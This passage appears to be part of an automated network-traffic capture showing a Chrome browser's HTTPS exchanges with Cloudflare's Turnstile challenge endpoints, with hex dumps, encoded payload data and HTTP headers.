                                                                          2025-01-14 21:50:33 UTC1369INData Raw: 5a 53 7a 72 5a 69 78 72 37 4b 4b 6c 36 6d 64 73 5a 75 58 6a 62 57 66 6f 73 65 35 6f 36 61 37 76 61 65 71 71 63 47 72 72 70 32 2b 6f 73 76 43 76 38 65 35 78 36 37 49 6d 4e 36 74 34 64 62 65 74 74 43 33 76 4e 7a 6d 70 71 43 2b 32 36 76 50 72 65 79 72 34 2b 44 6a 74 4d 7a 6b 37 72 66 51 2b 4c 4f 34 36 38 72 31 77 66 36 2f 38 74 72 2b 39 4e 76 39 78 77 66 39 79 2f 6a 63 37 38 6f 44 36 38 6f 45 47 4f 41 4d 31 52 7a 36 37 4f 6b 48 2f 50 49 55 2b 68 45 4e 35 53 50 6a 32 67 63 67 47 52 58 2b 2b 53 2f 73 43 41 59 4a 49 51 51 4a 36 66 45 7a 4b 79 38 62 44 7a 66 32 45 2f 67 36 4d 30 49 61 50 6a 64 46 48 6b 49 37 53 43 4a 47 50 30 73 6d 53 6b 4e 47 4b 6b 35 48 53 56 63 56 46 68 64 4f 55 6c 42 51 50 31 67 31 50 31 6f 37 4f 31 4a 67 4a 47 4e 6b 59 43 31 6b 4c 54 35 30
                                                                          Data Ascii: ZSzrZixr7KKl6mdsZuXjbWfose5o6a7vaeqqcGrrp2+osvCv8e5x67ImN6t4dbettC3vNzmpqC+26vPreyr4+DjtMzk7rfQ+LO468r1wf6/8tr+9Nv9xwf9y/jc78oD68oEGOAM1Rz67OkH/PIU+hEN5SPj2gcgGRX++S/sCAYJIQQJ6fEzKy8bDzf2E/g6M0IaPjdFHkI7SCJGP0smSkNGKk5HSVcVFhdOUlBQP1g1P1o7O1JgJGNkYC1kLT50
                                                                          2025-01-14 21:50:33 UTC1369INData Raw: 69 56 70 6e 74 36 74 72 57 74 66 36 75 34 75 72 70 35 71 5a 32 48 6c 37 75 38 6c 72 66 45 78 73 65 78 78 38 2b 6f 77 39 6e 52 30 73 66 53 32 4c 44 62 6d 64 75 34 6c 63 79 39 78 65 50 63 34 4b 61 6e 35 2b 57 72 35 2b 44 66 30 38 4c 31 79 71 37 6d 34 62 65 7a 75 38 6a 38 39 75 66 73 36 72 37 31 42 76 76 67 31 64 54 6a 77 38 45 4b 44 4e 72 33 41 67 63 48 78 66 58 70 30 2b 73 49 43 50 49 45 43 78 4d 62 32 78 34 63 44 64 77 67 33 65 4d 6b 49 53 66 6f 35 51 77 6e 41 4f 67 6a 4b 53 30 68 45 4f 7a 31 49 43 38 76 45 41 63 62 4f 2f 74 41 41 55 45 39 45 78 41 37 47 79 59 49 51 52 38 58 49 45 73 33 52 53 39 4b 4a 68 38 6c 56 54 39 4d 47 56 46 45 53 45 64 59 4d 31 77 67 57 46 77 32 56 52 34 6b 4d 7a 51 68 4b 6c 6b 35 62 69 73 70 59 32 6b 79 4c 6b 35 33 4e 46 49 35 62
                                                                          Data Ascii: iVpnt6trWtf6u4urp5qZ2Hl7u8lrfExsexx8+ow9nR0sfS2LDbmdu4lcy9xePc4Kan5+Wr5+Df08L1yq7m4bezu8j89ufs6r71Bvvg1dTjw8EKDNr3AgcHxfXp0+sICPIECxMb2x4cDdwg3eMkISfo5QwnAOgjKS0hEOz1IC8vEAcbO/tAAUE9ExA7GyYIQR8XIEs3RS9KJh8lVT9MGVFESEdYM1wgWFw2VR4kMzQhKlk5bispY2kyLk53NFI5b
                                                                          2025-01-14 21:50:33 UTC1369INData Raw: 66 75 70 6a 41 6f 35 71 76 74 38 43 48 79 38 58 48 77 73 76 52 79 49 2f 4c 79 6f 33 4f 6b 49 2f 51 6d 73 50 55 31 38 65 6f 32 39 62 41 34 74 48 4f 78 4d 44 64 79 64 33 66 31 39 65 6f 78 4f 58 53 30 4d 44 66 30 37 4b 76 34 4f 2b 7a 74 39 7a 38 39 73 33 31 2b 74 51 41 42 65 33 45 33 66 30 43 41 2f 7a 71 42 2f 66 70 42 73 6b 4c 44 42 51 51 35 4d 38 4c 2b 4f 67 49 2f 52 50 37 47 77 6f 43 32 79 4d 53 44 77 2f 38 4a 51 6a 2b 46 42 77 6c 36 7a 41 71 4c 43 63 77 4e 69 33 7a 4d 43 2f 78 4d 2f 54 7a 4e 66 34 6f 4f 54 77 73 44 55 41 6e 41 44 4d 34 4d 67 4e 4c 50 45 49 77 43 44 6f 77 44 43 31 4b 50 68 42 44 53 45 4d 70 55 45 35 48 55 6c 45 76 57 45 74 51 58 31 34 6c 4f 57 4a 6b 4b 46 68 6c 5a 6b 52 59 62 47 31 46 59 56 4e 75 63 45 5a 33 59 31 6c 52 63 57 67 37 4f 47
                                                                          Data Ascii: fupjAo5qvt8CHy8XHwsvRyI/Lyo3OkI/QmsPU18eo29bA4tHOxMDdyd3f19eoxOXS0MDf07Kv4O+zt9z89s31+tQABe3E3f0CA/zqB/fpBskLDBQQ5M8L+OgI/RP7GwoC2yMSDw/8JQj+FBwl6zAqLCcwNi3zMC/xM/TzNf4oOTwsDUAnADM4MgNLPEIwCDowDC1KPhBDSEMpUE5HUlEvWEtQX14lOWJkKFhlZkRYbG1FYVNucEZ3Y1lRcWg7OG
                                                                          2025-01-14 21:50:33 UTC1369INData Raw: 74 36 6d 2b 6c 4c 79 75 77 71 44 46 75 62 43 73 79 4c 53 6b 72 4d 71 34 75 4d 62 52 76 4b 79 34 31 38 4b 77 75 4d 37 46 74 4d 44 54 79 74 36 38 33 38 37 4d 34 75 4c 51 76 36 76 6c 31 61 2f 4d 36 74 72 59 78 4f 37 6c 33 4f 72 79 34 66 62 55 39 2b 61 2f 33 50 7a 70 32 4f 67 45 37 73 66 63 2f 76 48 4b 45 77 50 31 7a 2f 51 4e 2b 51 38 50 45 76 30 54 41 52 51 43 41 4e 73 54 42 66 51 54 47 78 49 4a 46 78 67 50 35 77 30 6c 45 78 45 66 4a 42 63 46 45 54 41 62 4c 79 63 72 48 51 30 52 4e 53 4d 67 2b 7a 67 6e 4a 54 73 39 4b 7a 38 5a 4f 79 35 44 4a 55 41 79 52 79 56 48 50 6a 55 35 52 7a 73 70 4d 56 41 2b 47 43 6c 4d 51 7a 45 31 58 45 64 62 50 56 78 4c 53 55 31 62 54 79 63 6f 5a 46 4a 52 5a 32 52 58 56 48 64 6f 57 6b 6c 4e 62 31 31 4e 58 57 74 71 59 57 39 31 5a 6c 56
                                                                          Data Ascii: t6m+lLyuwqDFubCsyLSkrMq4uMbRvKy418KwuM7FtMDTyt68387M4uLQv6vl1a/M6trYxO7l3Ory4fbU9+a/3Pzp2OgE7sfc/vHKEwP1z/QN+Q8PEv0TARQCANsTBfQTGxIJFxgP5w0lExEfJBcFETAbLycrHQ0RNSMg+zgnJTs9Kz8ZOy5DJUAyRyVHPjU5RzspMVA+GClMQzE1XEdbPVxLSU1bTycoZFJRZ2RXVHdoWklNb11NXWtqYW91ZlV
                                                                          2025-01-14 21:50:33 UTC1369INData Raw: 72 72 4c 30 59 76 49 70 72 36 6b 7a 4b 6a 44 6c 74 69 79 32 5a 32 62 34 65 48 41 34 74 75 64 70 4b 58 44 35 62 6a 71 34 36 54 58 72 63 76 74 77 50 4c 72 39 61 37 6f 30 75 48 6b 39 74 7a 30 38 72 6e 54 36 65 44 75 2f 67 4c 44 36 41 51 4b 77 2f 37 2b 37 67 4d 51 7a 67 6b 48 7a 65 66 39 39 41 4d 4f 41 2b 67 52 36 66 76 77 43 78 77 69 32 78 6e 2b 45 4f 58 67 35 69 76 35 41 77 63 71 37 65 63 79 4d 77 45 7a 4c 44 62 75 4b 51 6b 69 4a 53 73 64 50 68 30 31 45 69 41 58 41 44 78 48 4f 6a 67 2b 4d 7a 55 4d 52 45 35 44 54 30 68 54 43 30 55 70 50 6b 46 58 4f 56 73 35 55 54 49 38 4e 44 46 59 47 56 5a 55 57 6b 39 52 58 32 42 70 53 57 78 4e 4a 6d 67 73 5a 47 35 41 5a 47 70 66 59 6b 6c 77 4d 6e 51 34 63 48 70 4e 66 33 67 36 66 45 42 33 67 6c 52 34 66 6e 4e 31 52 49 52 47
                                                                          Data Ascii: rrL0YvIpr6kzKjDltiy2Z2b4eHA4tudpKXD5bjq46TXrcvtwPLr9a7o0uHk9tz08rnT6eDu/gLD6AQKw/7+7gMQzgkHzef99AMOA+gR6fvwCxwi2xn+EOXg5iv5Awcq7ecyMwEzLDbuKQkiJSsdPh01EiAXADxHOjg+MzUMRE5DT0hTC0UpPkFXOVs5UTI8NDFYGVZUWk9RX2BpSWxNJmgsZG5AZGpfYklwMnQ4cHpNf3g6fEB3glR4fnN1RIRG


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          25192.168.2.449777104.18.94.414434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:33 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/9020d7826b0a4252/1736891429985/QCebGfkPR2Y-Xxm HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:33 UTC200INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:33 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 61
                                                                          Connection: close
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d7a3ba71f795-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2025-01-14 21:50:33 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 27 00 00 00 2e 08 02 00 00 00 24 ce 97 aa 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: PNGIHDR'.$IDAT$IENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          26192.168.2.449779104.18.94.414434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:34 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1007293128:1736889469:3tFZVfEdHPgvRe4lFj_YIENTci-pgZz_bRcHbKlmagY/9020d7826b0a4252/5oMQoLsc2iOSixT_.cVI8XgYxH9viTIw7cmt1hNSqfE-1736891428-1.1.1.1-EcOzoDxYUj5Kq8T8UJb37UVA.AmT90LxN48yVCYD0ckCIbW51Z93jUI_qQzBlJ5Q HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:34 UTC442INHTTP/1.1 400 Bad Request
                                                                          Date: Tue, 14 Jan 2025 21:50:34 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 14
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          cf-chl-out: vIPy/6Y/f7USwsWPGYjLzKsjdmwVVj1v3LXqHPC8bCrjMZrHE/AaxpV2v7UWf0g2jEFccW2TjwoSIYL8SHEaTg==$I6SqhJDhnShHt/hyWmka/Q==
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d7a979eb0f81-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2025-01-14 21:50:34 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                          Data Ascii: {"err":100230}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          27192.168.2.449780104.18.95.414434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:43 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1007293128:1736889469:3tFZVfEdHPgvRe4lFj_YIENTci-pgZz_bRcHbKlmagY/9020d7826b0a4252/5oMQoLsc2iOSixT_.cVI8XgYxH9viTIw7cmt1hNSqfE-1736891428-1.1.1.1-EcOzoDxYUj5Kq8T8UJb37UVA.AmT90LxN48yVCYD0ckCIbW51Z93jUI_qQzBlJ5Q HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 34422
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Content-type: application/x-www-form-urlencoded
                                                                          CF-Chl-RetryAttempt: 0
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          CF-Challenge: 5oMQoLsc2iOSixT_.cVI8XgYxH9viTIw7cmt1hNSqfE-1736891428-1.1.1.1-EcOzoDxYUj5Kq8T8UJb37UVA.AmT90LxN48yVCYD0ckCIbW51Z93jUI_qQzBlJ5Q
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://challenges.cloudflare.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g5agr/0x4AAAAAAA2On-0a6Rkou75J/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:43 UTC16384OUTData Raw: 76 5f 39 30 32 30 64 37 38 32 36 62 30 61 34 32 35 32 3d 44 78 67 4b 25 32 62 52 56 74 38 57 78 4e 78 4e 32 78 56 51 56 57 35 39 51 77 30 75 77 6f 67 4e 78 74 4e 5a 4e 58 4c 68 30 4e 46 4e 30 39 56 6a 56 41 62 4e 37 41 4e 56 38 39 4e 2d 4e 6b 45 38 52 74 4e 7a 30 48 4b 52 6b 4e 35 41 48 6a 39 4f 4e 52 78 4e 55 4e 67 78 51 57 77 4b 62 79 53 4e 61 4b 62 33 73 51 37 62 75 67 56 70 58 77 32 4c 4e 6d 4e 42 46 68 67 4d 77 4e 56 77 4e 36 4b 68 6a 74 64 24 52 4e 4e 57 35 4e 44 38 48 24 38 41 4c 68 70 32 4b 4e 5a 77 77 47 69 2b 36 31 53 4e 69 4f 57 75 52 6c 48 51 65 62 35 38 77 4c 56 4c 58 31 37 57 4e 68 62 72 6c 47 32 76 4e 43 37 74 4e 52 62 4e 24 67 67 69 69 7a 36 57 31 31 61 79 68 33 6d 56 39 52 24 41 5a 5a 43 6f 65 35 6e 58 65 70 6d 38 72 6d 6c 68 59 45 73 7a
                                                                          Data Ascii: v_9020d7826b0a4252=DxgK%2bRVt8WxNxN2xVQVW59Qw0uwogNxtNZNXLh0NFN09VjVAbN7ANV89N-NkE8RtNz0HKRkN5AHj9ONRxNUNgxQWwKbySNaKb3sQ7bugVpXw2LNmNBFhgMwNVwN6Khjtd$RNNW5ND8H$8ALhp2KNZwwGi+61SNiOWuRlHQeb58wLVLX17WNhbrlG2vNC7tNRbN$ggiiz6W11ayh3mV9R$AZZCoe5nXepm8rmlhYEsz
                                                                          2025-01-14 21:50:43 UTC16384OUTData Raw: 4f 69 38 51 53 2b 45 46 4f 51 38 4b 31 71 6f 49 6d 4e 52 63 56 30 4e 43 4e 6c 4e 6c 74 4e 6a 4e 74 4c 56 6a 61 32 70 2d 39 51 66 48 6f 59 69 52 70 38 56 75 4e 52 71 45 6e 67 6b 4e 4e 39 52 6a 4e 39 4e 57 39 62 5a 4b 61 4e 56 39 6c 49 4e 39 4e 65 39 4e 32 56 76 4e 59 39 62 67 56 35 4e 30 4c 68 57 56 42 4e 31 4e 56 6a 56 4d 4e 5a 51 51 38 56 6c 6a 2d 74 75 74 56 4a 78 4e 32 62 52 56 48 4e 65 4c 62 55 66 77 67 74 4b 51 6e 30 56 4a 6b 4c 75 78 56 30 4c 37 4e 51 69 53 4b 38 37 4b 44 37 38 74 4e 55 30 4e 39 4e 64 4e 6f 4b 55 30 4e 24 4e 71 77 52 55 56 4a 4e 4b 39 31 49 6c 78 36 57 77 6c 32 4e 41 4e 78 70 32 4a 4e 65 4e 44 71 47 67 68 4b 38 42 32 56 69 4b 59 67 44 4b 67 24 44 63 39 31 76 59 36 53 46 6e 35 4b 4e 33 56 70 4b 74 41 56 4e 4e 49 71 44 4b 55 71 53 77
                                                                          Data Ascii: Oi8QS+EFOQ8K1qoImNRcV0NCNlNltNjNtLVja2p-9QfHoYiRp8VuNRqEngkNN9RjN9NW9bZKaNV9lIN9Ne9N2VvNY9bgV5N0LhWVBN1NVjVMNZQQ8Vlj-tutVJxN2bRVHNeLbUfwgtKQn0VJkLuxV0L7NQiSK87KD78tNU0N9NdNoKU0N$NqwRUVJNK91Ilx6Wwl2NANxp2JNeNDqGghK8B2ViKYgDKg$Dc91vY6SFn5KN3VpKtAVNNIqDKUqSw
                                                                          2025-01-14 21:50:43 UTC1654OUTData Raw: 42 56 35 43 50 39 5a 6e 6b 67 56 6e 48 53 4b 75 6a 63 51 56 33 56 6f 32 55 30 39 62 58 46 4c 4e 35 6c 53 4c 7a 74 69 68 6f 76 30 62 77 34 31 4e 68 51 73 4f 56 55 74 52 76 44 4c 55 47 4e 42 36 46 31 4b 31 2d 53 68 63 66 4b 46 39 74 4b 6c 76 56 51 32 36 49 2b 4e 31 33 53 53 30 6a 24 30 64 37 72 42 62 51 34 44 48 70 32 37 50 48 70 4b 30 7a 34 6e 70 37 4b 6c 44 57 4c 4e 65 4e 51 43 42 47 41 4c 5a 4a 24 62 66 65 36 78 37 30 46 59 48 62 57 72 42 68 2d 7a 48 4e 74 74 56 6c 63 44 58 69 24 6d 32 55 78 39 57 4e 4e 39 4e 6b 52 44 6d 76 75 4c 2d 2d 48 67 24 30 4e 30 4c 79 6d 31 41 5a 68 4e 58 41 69 43 7a 79 51 4d 77 56 78 64 52 77 4a 75 6e 6b 45 35 4e 75 59 33 24 68 5a 39 51 7a 45 35 4e 32 79 41 59 49 4f 2b 49 6a 37 2b 72 58 59 36 39 24 4a 31 66 7a 30 79 46 4b 62 35
                                                                          Data Ascii: BV5CP9ZnkgVnHSKujcQV3Vo2U09bXFLN5lSLztihov0bw41NhQsOVUtRvDLUGNB6F1K1-ShcfKF9tKlvVQ26I+N13SS0j$0d7rBbQ4DHp27PHpK0z4np7KlDWLNeNQCBGALZJ$bfe6x70FYHbWrBh-zHNttVlcDXi$m2Ux9WNN9NkRDmvuL--Hg$0N0Lym1AZhNXAiCzyQMwVxdRwJunkE5NuY3$hZ9QzE5N2yAYIO+Ij7+rXY69$J1fz0yFKb5
                                                                          2025-01-14 21:50:44 UTC1347INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:44 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 4624
                                                                          Connection: close
                                                                          cf-chl-out-s: e24T4RyKPScJV2e0u6yey7urAtdqhpzIaZJzBC64mP3yk+Q/zDNutBtFq3AuHRA0FcNrMXHD6SXp70aRevbJJkOetQ83jWT4F79njSbufsAGaIKPJDTMJAvELBxoEhsVGJ/0eyjpCn/FscvEIuYWmSanwm7Rz5hqhh2zBAYHQDj+Our6OhI0yYfK9GlOy3vHA42vuSLCi+H4QMZ/jBwZ6kyGMaU6eulwDlZQsQWpoPhJdhZvFf5u4z2lrm7zjzYGcwHfAnVVqk5cPYYamZr3P/8VRG40MK4JF1i/GpI6JzSrcx3uGJWAjXT8IdsRFs7+Jh32Gg8mfBqZS3AdgsKSngrivqaNl3x2fKpMqm7/8JPgxdmmjSGMb8P4xx5QhCPgZvpka+70QaRnuiT6L67HpNayKj7K3A6QBym2X9vOgEU0fUOVSQSvpNoTyXnfDo0pew39LZ/Ikbd0ejtv09EKC7ldFywYp9ikX3rLwMR+unJ6p4rPm4Ft52l6MM7qinc+6C53LSQ4ivl4Wma/gjbe5lzb0Nb4EB/cJAHPpDmJ7416b+OXtM5ocxZ11CNGITkXZ7P8LqiRM6QElB3DMBN2hniV6J2DSpRPFqbGDcH3gklsnszhGBKTC2eigAxOk/dzL6gmn125aGLAXgqeWNXUFbwoFez4modZsGrEmwr+Rmuby7szuMqMJQMwzaBScd5Gkp9eyPAjfR/0/tKSOyp/kkQRYRpAKQ1uyExEmrCZRiEcJj3vwbSFGl9FfLqbFGJBFBImVF3Og8PnqWrFgSR7e4NpgP/XGmn12Czl30AkcvWhN9GZpL/jcdA0U2drkPttMiLTKHBDQRqYsJkIe0TRqO4E73CI8qEqixTv9XFZJhWQ+MxMvp8iR9vJ77yr9FEJbJUjkCgqQhgXjqr0HqdS442kT5ky/TGPn6oh/PDNa/25Zchw1Cj7UNB2z6XKQ1L6jzBw0VvGOC3lQTIvr0UE22SUj4HVoaWBqxSLSn/8oRs=$8VR1N [TRUNCATED]
                                                                          cf-chl-out: S7onbtdgRM+5pjScM+btuTeaFaeOzZrf32fhK1qbiRls4/2Is/tJP1A3Lpa6RX14ifE4zn6gq9YRd29tdtmKEgzTYutVSUkQNe+XuZaRw2g=$ojJGUCqmefrtMVaEnL0c2A==
                                                                          Server: cloudflare
                                                                          2025-01-14 21:50:44 UTC62INData Raw: 43 46 2d 52 41 59 3a 20 39 30 32 30 64 37 65 34 38 61 66 35 30 66 35 64 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                          Data Ascii: CF-RAY: 9020d7e48af50f5d-EWRalt-svc: h3=":443"; ma=86400
                                                                          2025-01-14 21:50:44 UTC1329INData Raw: 58 59 68 6c 67 59 35 6c 61 5a 4f 43 56 57 6d 56 66 6f 35 65 6f 6c 79 54 6c 5a 68 6d 66 5a 57 6e 5a 31 31 36 6d 57 36 45 61 36 64 38 72 34 69 51 64 58 2b 4d 71 71 2b 34 6d 36 6d 54 72 4c 6c 36 67 58 6d 39 66 6f 53 7a 76 59 61 48 78 36 75 38 77 38 79 35 76 61 66 50 70 38 2b 56 78 4b 76 58 6c 62 50 64 33 4e 50 63 7a 63 32 30 6c 62 50 64 70 4f 53 7a 34 74 2f 6e 34 64 6e 41 78 64 6e 70 72 63 6e 68 72 72 58 49 74 76 47 30 37 4e 66 78 76 64 58 4d 79 73 44 5a 39 51 54 44 42 4e 50 34 41 41 67 4b 2b 65 50 37 37 77 72 4f 45 4f 44 6c 31 65 30 43 44 74 72 79 37 78 77 55 48 43 49 4f 39 4e 58 69 4a 66 50 76 47 78 6b 6b 35 79 54 32 49 4f 34 49 4d 77 41 6a 43 68 45 4b 44 43 59 4b 4e 69 55 56 45 76 55 77 2f 50 63 52 50 68 45 64 47 45 44 36 4e 6a 4d 4c 53 69 46 51 4f 52 70
                                                                          Data Ascii: XYhlgY5laZOCVWmVfo5eolyTlZhmfZWnZ116mW6Ea6d8r4iQdX+Mqq+4m6mTrLl6gXm9foSzvYaHx6u8w8y5vafPp8+VxKvXlbPd3NPczc20lbPdpOSz4t/n4dnAxdnprcnhrrXItvG07NfxvdXMysDZ9QTDBNP4AAgK+eP77wrOEODl1e0CDtry7xwUHCIO9NXiJfPvGxkk5yT2IO4IMwAjChEKDCYKNiUVEvUw/PcRPhEdGED6NjMLSiFQORp
                                                                          2025-01-14 21:50:44 UTC1369INData Raw: 56 70 6f 53 48 42 7a 55 6c 64 36 55 54 31 5a 65 45 4e 70 63 33 70 70 58 6c 6d 41 53 49 75 49 63 57 4e 55 6a 59 6c 6f 6c 34 6d 46 61 58 57 4c 6b 56 70 59 56 34 4f 44 59 46 79 54 68 34 4a 31 6f 48 32 63 6e 70 68 2b 71 49 71 61 67 36 53 4d 6f 58 4b 72 64 70 6d 4e 70 37 53 6f 6a 61 69 58 75 4c 6c 32 75 62 36 59 6e 72 2b 79 77 5a 57 36 77 5a 36 4a 70 62 47 6a 77 4c 54 4f 71 4b 36 6c 78 64 48 58 6c 73 33 56 79 4e 58 5a 6e 72 32 63 31 73 57 35 32 4e 71 39 79 73 4c 6b 76 71 6a 6d 33 75 6a 47 33 39 2f 73 34 2b 33 6e 7a 65 76 77 33 37 76 4f 39 4f 48 6a 30 66 72 34 2b 2b 48 49 38 67 43 2b 36 2b 37 4b 43 65 44 7a 35 4f 62 72 42 76 54 51 32 52 48 6f 48 51 2f 2b 38 66 37 70 44 52 76 32 42 41 63 65 42 2f 34 4b 2f 51 4d 64 48 75 6f 73 48 52 33 73 45 76 49 6d 46 7a 41 76
                                                                          Data Ascii: VpoSHBzUld6UT1ZeENpc3ppXlmASIuIcWNUjYlol4mFaXWLkVpYV4ODYFyTh4J1oH2cnph+qIqag6SMoXKrdpmNp7SojaiXuLl2ub6Ynr+ywZW6wZ6JpbGjwLTOqK6lxdHXls3VyNXZnr2c1sW52Nq9ysLkvqjm3ujG39/s4+3nzevw37vO9OHj0fr4++HI8gC+6+7KCeDz5ObrBvTQ2RHoHQ/+8f7pDRv2BAceB/4K/QMdHuosHR3sEvImFzAv
                                                                          2025-01-14 21:50:44 UTC1369INData Raw: 68 58 4f 57 35 38 59 46 31 77 65 48 2b 41 56 6b 61 48 64 34 56 74 69 58 75 56 58 34 39 71 5a 70 6d 55 62 57 74 78 6d 49 74 53 69 59 4e 79 6f 31 78 78 5a 70 61 6b 6d 35 39 6b 6d 61 5a 70 65 61 4b 63 67 61 2b 6b 68 62 4f 44 70 59 2b 34 70 62 56 37 6c 5a 2b 34 67 5a 6d 54 77 36 2b 62 68 36 53 71 6c 34 6a 49 72 63 79 4e 78 38 6d 37 7a 38 44 42 70 38 44 50 79 71 6a 63 73 4e 44 57 74 73 2f 43 31 35 33 42 30 74 2b 35 36 74 72 4c 35 36 66 57 71 74 7a 41 34 4e 43 30 36 75 43 77 39 4d 6e 69 74 63 62 57 38 50 4b 79 79 2b 7a 34 2b 37 7a 30 35 64 45 47 2b 73 62 34 41 2b 37 4d 33 51 73 41 34 2f 45 54 41 75 55 4a 43 76 76 56 33 42 34 53 37 79 48 32 44 78 6b 51 49 77 63 47 45 66 63 5a 49 52 58 31 44 68 44 77 49 69 6b 54 35 67 45 6f 38 51 59 74 4d 6a 51 4f 4d 79 66 34 2f
                                                                          Data Ascii: hXOW58YF1weH+AVkaHd4VtiXuVX49qZpmUbWtxmItSiYNyo1xxZpakm59kmaZpeaKcga+khbODpY+4pbV7lZ+4gZmTw6+bh6Sql4jIrcyNx8m7z8DBp8DPyqjcsNDWts/C153B0t+56trL56fWqtzA4NC06uCw9MnitcbW8PKyy+z4+7z05dEG+sb4A+7M3QsA4/ETAuUJCvvV3B4S7yH2DxkQIwcGEfcZIRX1DhDwIikT5gEo8QYtMjQOMyf4/
                                                                          2025-01-14 21:50:44 UTC557INData Raw: 48 69 6f 42 5a 59 55 78 34 53 6c 43 45 67 49 5a 47 5a 49 5a 52 53 6d 4f 4b 6a 33 32 48 6b 4a 65 42 59 59 39 64 56 6e 65 55 6e 46 71 48 6d 48 74 31 6e 61 56 73 6b 61 79 61 6b 6d 79 78 6f 4b 2b 43 6a 36 79 4c 71 36 36 74 65 70 61 30 75 70 4e 39 6d 61 36 58 74 4a 36 31 6d 36 4b 6c 75 73 53 71 6e 4d 6d 77 30 39 4f 2f 74 63 69 77 79 4a 62 54 6e 62 2b 58 34 4c 58 43 6e 71 33 56 78 37 57 2b 75 4d 72 6a 79 73 62 67 71 50 43 2f 32 74 48 76 39 65 36 79 74 63 4c 70 74 73 37 46 39 4d 77 41 41 65 79 37 76 50 76 76 32 4e 6b 4a 2b 73 6a 65 41 67 54 68 38 51 54 37 43 4f 59 50 44 52 44 70 30 42 45 52 38 67 77 57 32 66 59 57 47 66 54 63 4a 42 77 4a 34 52 67 68 2b 76 58 6d 4a 51 38 5a 49 79 6f 44 43 79 73 73 46 77 59 35 4a 52 30 39 4b 53 6e 38 45 7a 59 35 49 78 73 31 50 52
                                                                          Data Ascii: HioBZYUx4SlCEgIZGZIZRSmOKj32HkJeBYY9dVneUnFqHmHt1naVskayakmyxoK+Cj6yLq66tepa0upN9ma6XtJ61m6KlusSqnMmw09O/tciwyJbTnb+X4LXCnq3Vx7W+uMrjysbgqPC/2tHv9e6ytcLpts7F9MwAAey7vPvv2NkJ+sjeAgTh8QT7COYPDRDp0BER8gwW2fYWGfTcJBwJ4Rgh+vXmJQ8ZIyoDCyssFwY5JR09KSn8EzY5Ixs1PR


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          28192.168.2.449781104.18.94.414434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
